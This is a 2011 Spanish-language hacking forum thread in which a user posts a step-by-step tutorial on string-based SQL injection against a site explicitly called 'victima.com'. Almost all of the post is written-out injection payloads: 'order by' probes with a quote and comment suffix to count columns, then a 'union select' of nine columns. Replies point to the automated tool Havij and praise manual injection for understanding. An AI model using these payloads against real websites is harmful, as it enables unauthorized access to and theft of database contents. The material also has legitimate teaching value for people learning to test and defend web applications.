String Based SQL injection

  • 2 Respuestas
  • 2791 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email

String Based SQL injection

  • en: Agosto 25, 2011, 12:00:05 am
Supongamos que tenemos un sitio:

www.victima.com/index.php?ID=1'

Intentamos con el comando comun de

www.victima.com/index.php?ID=1+order+by+1--

No tenemos un error

Probamos con

www.victima.com/index.php?ID=1+order+by+10000--

No tenemos un error

Hay que hacer una string based injection

www.victima.com/index.php?ID=1'+order+by+1--+-

No tenemos error

Probamos con

www.victima.com/index.php?ID=1'+order+by+10--+-

TENEMOS ERROR!!

Entonces supongamos que probamos con

www.victima.com/index.php?ID=1'+order+by+9--+-

Y ahi no tenemos error o sea que son 9 columnas!

Entonces ahi seguimos como con una inyeccion normal

www.victima.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9--+-

Bueno espero que les haya gustado!!

Desconectado 2bit-fox

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
  • Flesh & Bone
    • Ver Perfil
    • Email

Re:String Based SQL injection

  • en: Agosto 26, 2011, 02:37:33 am
El método algo lento, pero para el que le gusta escribir bien. Sino use Havij! jejeje.
Saludos.
"Mientras tú pescas, yo estoy cultivando"

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email

Re:String Based SQL injection

  • en: Agosto 26, 2011, 03:01:10 am
El método algo lento, pero para el que le gusta escribir bien. Sino use Havij! jejeje.
Saludos.

Claro el Havij es para automatizar todo esto pero hay gente que le interesa mas las inyecciones manuales ya que quieren entender a fondo todo lo que estan haciendo en vez de que una herramienta se lo haga por el.

 

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 3299
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 3116
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
Tecnicas de Blind Mysql Injection (Bit Shifting && Find_in_set())

Iniciado por q3rv0

Respuestas: 3
Vistas: 3723
Último mensaje Agosto 30, 2012, 12:50:52 am
por andrewtwo
HTML injection (Ataque y Defensa) [Practico] By 2Fac3R

Iniciado por 2Fac3R

Respuestas: 2
Vistas: 3479
Último mensaje Diciembre 28, 2012, 03:03:19 am
por 2Fac3R
LDAP Injection (Lightweight Directory Access Protocol)

Iniciado por M5f3r0

Respuestas: 1
Vistas: 3400
Último mensaje Noviembre 01, 2013, 02:19:28 pm
por ANTRAX